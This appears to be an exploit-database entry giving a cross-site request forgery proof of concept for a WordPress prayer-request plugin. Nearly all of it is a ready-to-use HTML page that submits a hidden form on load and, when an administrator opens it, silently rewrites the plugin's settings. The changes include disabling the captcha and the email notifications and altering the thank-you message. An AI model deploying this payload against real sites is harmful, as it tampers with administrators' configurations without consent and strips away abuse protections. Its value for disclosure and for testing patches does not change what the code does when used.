Share
## https://sploitus.com/exploit?id=WPEX-ID:94F4CC45-4C55-43D4-8AD2-A20C118B589F
Have an admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/edit.php?post_type=prayers&page=pray-settings" method="post" enctype="multipart/form-data">
        <input type="hidden" name="upr_no_prayer_per_page" value="9999" />
        <input type="hidden" name="upr_login_not_required_request" value="0" />
        <input type="hidden" name="upr_prayer_send_email" value="0" />
        <input type="hidden" name="upr_prayer_send_admin_email" value="0" />
        <input type="hidden" name="upr_prayer_default_status_pending" value="0" />
        <input type="hidden" name="upr_prayer_hide_captcha" value="0" />
        <input type="hidden" name="sitekey_gc" value="0" />
        <input type="hidden" name="secret_gc" value="0" />
        <input type="hidden" name="upr_prayer_show_country" value="0" />
        <input type="hidden" name="upr_time_interval_pray_prayed_button" value="0" />
        <input type="hidden" name="upr_prayer_thankyou" value="CSRF" />
        <input type="hidden" name="upr_prayer_fetch_req_from" value="all" />     
        <input type="hidden" name="prayerssettings" value="Update" />
        <input type="submit" value="submit">
    </form>
</body>

```